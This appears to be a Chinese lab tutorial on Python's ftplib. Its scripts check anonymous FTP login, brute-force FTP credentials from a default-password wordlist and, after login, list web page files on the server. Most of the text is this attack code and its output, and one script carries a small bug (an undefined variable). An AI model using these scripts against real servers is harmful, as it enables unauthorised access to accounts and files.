python---ftplib,ftp使用，ftp破解用户与密码，ftp服务器查找web页面

python—ftplib,ftp使用

一、环境配置
1、在windows服务器192.168.40.239上开启ftp的匿名连接

2、在客户端192.168.40.128使用匿名进行连接ftp服务器

二、使用Python代码连接ftp服务器
1、使用基本匿名连接

root@kali:~/python/ftp# ls
ftp_anonymous_input.py  ftp_anonymous.py


root@kali:~/python/ftp# cat ftp_anonymous.py 
#!/usr/bin/python
# --*-- coding:utf-8 --*--

import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login("anonymous","[email protected]")
        print "\n[*] " + str(hostname) + " FTP Anonymous Login Successed!!"
        ftp.quit()
        #retrun True
    except Exception,e:
        print "\n[-] " + str(h1) + " FTP Anonymous Login Failed."
        #return False

hostname = "192.168.40.239"
anonLogin(hostname)

root@kali:~/python/ftp# 

root@kali:~/python/ftp# 

python运行情况

root@kali:~/python/ftp# python ftp_anonymous.py 

[*] 192.168.40.239 FTP Anonymous Login Successed!!
root@kali:~/python/ftp#

2、使用命令行输入交互的匿名连接

root@kali:~/python/ftp# ls
ftp_anonymous_input.py  ftp_anonymous.py
root@kali:~/python/ftp# cat ftp_anonymous_input.py 
#!/usr/bin/python
# --*-- coding:utf-8 --*--

import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login("anonymous","[email protected]")
        print "\n[*] " + str(hostname) + " FTP Anonymous Login Successed!!"
        ftp.quit()
    except Exception,e:
        print "\n[-] " + str(hostname) + " FTP Anonymous Login Failed."

def main():
    while True:
        hostname = raw_input("Please enter the hostname: ")
        anonLogin(hostname)

if __name__ == "__main__":
    main()

root@kali:~/python/ftp# 

脚本运行情况

root@kali:~/python/ftp# python ftp_anonymous_input.py 
Please enter the hostname: 192.168.40.29

[-] 192.168.40.29 FTP Anonymous Login Failed.
Please enter the hostname: 192.168.40.239

[*] 192.168.40.239 FTP Anonymous Login Successed!!
Please enter the hostname: 

三、破解ftp服务器的用户名与密码
参考：http://blog.csdn.net/u014538198/article/details/73603781
https://docs.python.org/2/library/ftplib.html
https://www.cnblogs.com/hltswd/p/6228992.html
1、环境搭建，ftp服务器192.168.40.239，用户名adminxwb，密码adminxwb

破解的用户名与密码字典文件ftpuserpd.txt

root@kali:~/python/ftp# cat ftpuserpd.txt 
admin:admin
admin:123456
admin:password
root:root
root:toor
root:123456
root:password
adminxwb:adminxwb
root@kali:~/python/ftp# 

2.1、客户端192.168.40.128的python脚本代码（非用户交互）

root@kali:~/python/ftp# clear
root@kali:~/python/ftp# ls
ftp_anonymous_input.py  ftp_anonymous.py  ftpcreakbask_input.py  ftpcreakbask.py  ftpuserpd.txt  tab.py  tab.pyc
root@kali:~/python/ftp#  cat ftpcreakbask.py 
#!/usr/bin/python
# --*-- coding:utf-8 --*--

from ftplib import FTP

def ftpcreakbase(hostname,passwordfile):
    pdfile = open(passwordfile,"r")
    for line in pdfile.readlines():
        username = line.split(":")[0]
        password = line.split(":")[1].strip("\r").strip("\n")
        print "[++++] Trying: " + username + "/" + password
        try:
            ftp = FTP(hostname)
            ftp.login(username,password)
            print ftp.getwelcome()#读取ftp的banner信息
            ftp.cwd("")#切换到ftp的根目录
            #ftp.cmd("test")#切换到ftp服务器中test目录中
            ftp.retrlines("LIST")#把ftp的根目录所有信息打印出来
            print "\nFTP用户名与密码破解成功!!!"
            print "ftp机器是%s,用户名是%s,密码是%s" %(str(hostname),username,password)
            ftp.quit()
            return (username,password)#必须增加此句返回，否则跳入except语句中
        except Exception, e:
            pass
    print "\n[----] 破解失败！！"

host = "192.168.40.239"
passfile = "ftpuserpd.txt"
ftpcreakbase(host,passfile)

root@kali:~/python/ftp# 

2.2、脚本运行情况

root@kali:~/python/ftp# python ftpcreakbask.py 
[++++] Trying: admin/admin
[++++] Trying: admin/123456
[++++] Trying: admin/password
[++++] Trying: root/root
[++++] Trying: root/toor
[++++] Trying: root/123456
[++++] Trying: root/password
[++++] Trying: adminxwb/adminxwb
220 you are welcome!! go to miniftp!!
drwx------ 1 user group              0 Jan 27 09:23 admin
-rwx------ 1 user group           8686 Mar 13 16:38 login3.png
drwx------ 1 user group              0 Jan 27 09:23 test

FTP用户名与密码破解成功!!!
ftp机器是192.168.40.239,用户名是adminxwb,密码是adminxwb
root@kali:~/python/ftp# 

3.1、客户端192.168.40.128的python脚本代码（用户交互）

3.1.1、用户交互时raw_input可以回退删除错误的字母的脚本tab.py

root@kali:~/python/ftp# cat tab.py
#pyhton startup file

import sys
import readline
import rlcompleter
import atexit
import os
#tab completion
readline.parse_and_bind('tab:complete')
#history file
histfile = os.path.join(os.environ['HOME'],'.pythonhistory')
try:
    readline.read_history_file(histfile)
except IOError:
    pass
atexit.register(readline.write_history_file,histfile)

del os, histfile, readline, rlcompleter
root@kali:~/python/ftp# 

3.1.2、核心的交互的脚本文件

root@kali:~/python/ftp# clear
root@kali:~/python/ftp# ls
ftp_anonymous_input.py  ftp_anonymous.py  ftpcreakbask_input.py  ftpcreakbask.py  ftpuserpd.txt  tab.py  tab.pyc
root@kali:~/python/ftp# 


root@kali:~/python/ftp# cat ftpcreakbask_input.py 
#!/usr/bin/python
# --*-- coding:utf-8 --*--
import tab
from ftplib import FTP

def ftpcreakbase(hostname,passwordfile):
    pdfile = open(passwordfile,"r")
    for line in pdfile.readlines():
        username = line.split(":")[0]
        password = line.split(":")[1].strip("\r").strip("\n")
        print "[++++] Trying: " + username + "/" + password
        try:
            ftp = FTP(hostname)
            ftp.login(username,password)
            print ftp.getwelcome()#读取ftp的banner信息
            ftp.cwd("")#切换到ftp的根目录
            #ftp.cmd("test")#切换到ftp服务器中test目录中
            ftp.retrlines("LIST")#把ftp的根目录所有信息打印出来
            print "\nFTP用户名与密码破解成功!!!"
            print "ftp机器是%s,用户名是%s,密码是%s" %(str(hostname),username,password)
            ftp.quit()
            return (username,password)#必须增加此句返回，否则跳入except语句中
        except Exception, e:
            pass
    print "\n[----] 破解失败！！"

hn = raw_input("[****] 请输入连接的ftp服务器: ")
pf = raw_input("[----] 请输入破解ftp服务器的用户名与密码的字典文件: ")
ftpcreakbase(hn,pf)
root@kali:~/python/ftp# 

3.2、脚本运行情况

root@kali:~/python/ftp# 
root@kali:~/python/ftp# python ftpcreakbask_input.py 
[****] 请输入连接的ftp服务器: 192.168.40.239
[----] 请输入破解ftp服务器的用户名与密码的字典文件: ftpuserpd.txt
[++++] Trying: admin/admin
[++++] Trying: admin/123456
[++++] Trying: admin/password
[++++] Trying: root/root
[++++] Trying: root/toor
[++++] Trying: root/123456
[++++] Trying: root/password
[++++] Trying: adminxwb/adminxwb
220 you are welcome!! go to miniftp!!
drwx------ 1 user group              0 Jan 27 09:23 admin
-rwx------ 1 user group           8686 Mar 13 16:38 login3.png
drwx------ 1 user group              0 Jan 27 09:23 test

FTP用户名与密码破解成功!!!
ftp机器是192.168.40.239,用户名是adminxwb,密码是adminxwb
root@kali:~/python/ftp# 

四、在FTP服务器上搜索网页的文件
有了FTP服务器的登录口令之后，可以进行测试该FTP服务器是否提供Web服务，其中检测通过nlst()列出的每个文件的文件名是不是默认的Web页面文件名，并把找到的所有默认的网页(.asp、.html、.php)都添加到retList数组中：

1、FTP服务器192.168.40.239的文件信息

2.1、客户端，脚本代码（非用户交换）

root@kali:~/python/ftp# ls
ftp_anonymous_input.py  ftpcreakbask_input.py  ftpuserpd.txt     tab.py
ftp_anonymous.py        ftpcreakbask.py        ftp_userpdweb.py  tab.pyc
root@kali:~/python/ftp# cat ftp_userpdweb.py 
#!/usr/bin/python
# --*-- coding:utf-8 --*--

import ftplib

def returnDefault(ftp):
    try:
        print "对ftp服务器的根目录下搜索"
        dirList = ftp.nlst()#对ftp服务器的根目录下搜索
        #print "对ftp服务器根目录下test目录下搜索"
        #dirList = ftp.nlst("test")#nlst()方法获取目录的文件，对ftp服务器根目录下test目录下搜索
    except Exception,e:
        print "[----] 目录为空！继续查找！"
    retlist = []
    for filename in dirList:
        fn = filename.lower()#lower()方法将文件名都转换为小写的形式
        if ".php" in fn or ".asp" in fn or ".html" in fn:#查找.php、.asp、.html文件
            retlist.append(filename)
            print "[++++] Found defaukt pages:%s" %filename
    return retlist

host = "192.168.40.239"
username = "adminxwb"
password = "adminxwb"
ftp = ftplib.FTP(host)
ftp.login(username,password)
returnDefault(ftp)

root@kali:~/python/ftp#

2.2、客户端，代码运行情况

root@kali:~/python/ftp# 
root@kali:~/python/ftp# 
root@kali:~/python/ftp# python ftp_userpdweb.py 
对ftp服务器的根目录下搜索
[++++] Found defaukt pages:1234.html
[++++] Found defaukt pages:l.php
[++++] Found defaukt pages:swd.asp
root@kali:~/python/ftp# 

2.3、客户端，对ftp服务器根目录下test目录下搜索

root@kali:~/python/ftp# clear
root@kali:~/python/ftp# ls
ftp_anonymous_input.py  ftpcreakbask_input.py  ftpuserpd.txt     tab.py
ftp_anonymous.py        ftpcreakbask.py        ftp_userpdweb.py  tab.pyc
root@kali:~/python/ftp# vi ftp_userpdweb.py 


root@kali:~/python/ftp# cat ftp_userpdweb.py 
#!/usr/bin/python
# --*-- coding:utf-8 --*--

import ftplib

def returnDefault(ftp):
    try:
        #print "对ftp服务器的根目录下搜索"
        #dirList = ftp.nlst()#对ftp服务器的根目录下搜索
        print "对ftp服务器根目录下test目录下搜索"
        dirList = ftp.nlst("test")#nlst()方法获取目录的文件，对ftp服务器根目录下test目录下搜索
    except Exception,e:
        print "[----] 目录为空！继续查找！"
    retlist = []
    for filename in dirList:
        fn = filename.lower()#lower()方法将文件名都转换为小写的形式
        if ".php" in fn or ".asp" in fn or ".html" in fn:
            retlist.append(filename)
            print "[++++] Found defaukt pages:%s" %filename
    return retlist

host = "192.168.40.239"
username = "adminxwb"
password = "adminxwb"
ftp = ftplib.FTP(host)
ftp.login(username,password)
returnDefault(ftp)

root@kali:~/python/ftp# 
root@kali:~/python/ftp# 


root@kali:~/python/ftp# python ftp_userpdweb.py 
对ftp服务器根目录下test目录下搜索
[++++] Found defaukt pages:8ujhh.asp
[++++] Found defaukt pages:phpinfo.php
root@kali:~/python/ftp# 

3、客户端，tab.py脚本代码，交互用户输入可以随意退格

root@kali:~/python/ftp# 
root@kali:~/python/ftp# cat tab.py
#pyhton startup file

import sys
import readline
import rlcompleter
import atexit
import os
#tab completion
readline.parse_and_bind('tab:complete')
#history file
histfile = os.path.join(os.environ['HOME'],'.pythonhistory')
try:
    readline.read_history_file(histfile)
except IOError:
    pass
atexit.register(readline.write_history_file,histfile)

del os, histfile, readline, rlcompleter
root@kali:~/python/ftp# 

3.1、客户端，python脚本代码（与用户进行交互）

root@kali:~/python/ftp# ls
ftp_anonymous_input.py  ftpcreakbask_input.py  ftpuserpd.txt          ftp_userpdweb.py  tab.pyc
ftp_anonymous.py        ftpcreakbask.py        ftp_userpdwebinput.py  tab.py
root@kali:~/python/ftp# cat ftp_userpdwebinput.py 
#!/usr/bin/python
# --*-- coding:utf-8 --*--

import ftplib
import tab

def returnDefault(ftp):
    try:
        print "对ftp服务器的根目录下搜索"
        dirList = ftp.nlst()#对ftp服务器的根目录下搜索
        #print "对ftp服务器根目录下test目录下搜索"
        #dirList = ftp.nlst("test")#nlst()方法获取目录的文件，对ftp服务器根目录下test目录下搜索
    except Exception, e:
        print "[----] 目录为空！继续查找！"
    retList = []
    for filename in dirList:
        fn = filename.lower()#lower()方法将文件名都转换为小写的形式
        if ".php" in fn or ".asp" in fn or ".html" in fn:
            retList.append(filename)
            print "[++++] Found defaukt pages:%s" %filename
    if len(retList) == 0:
        print "[----] 目录为空！继续查找！"

    return retList
def main():
    while True:
        host = raw_input("[++++] 请输入FTP服务器的IP地址: ")
        username = raw_input("[****] 请输入FTP服务器的用户名: ")
        password = raw_input("[****] 请输入FTP服务器的登录密码: ")
        ftp = ftplib.FTP(host)
        ftp.login(username,password)
        returnDefault(ftp)

if __name__ == "__main__":
    main()

root@kali:~/python/ftp# 
root@kali:~/python/ftp# 

3.2、客户端，脚本运行情况

root@kali:~/python/ftp# 
root@kali:~/python/ftp# python ftp_userpdwebinput.py 
[++++] 请输入FTP服务器的IP地址: 192.168.40.239
[****] 请输入FTP服务器的用户名: adminxwb
[****] 请输入FTP服务器的登录密码: adminxwb
对ftp服务器的根目录下搜索
[++++] Found defaukt pages:1234.html
[++++] Found defaukt pages:l.php
[++++] Found defaukt pages:swd.asp
[++++] 请输入FTP服务器的IP地址: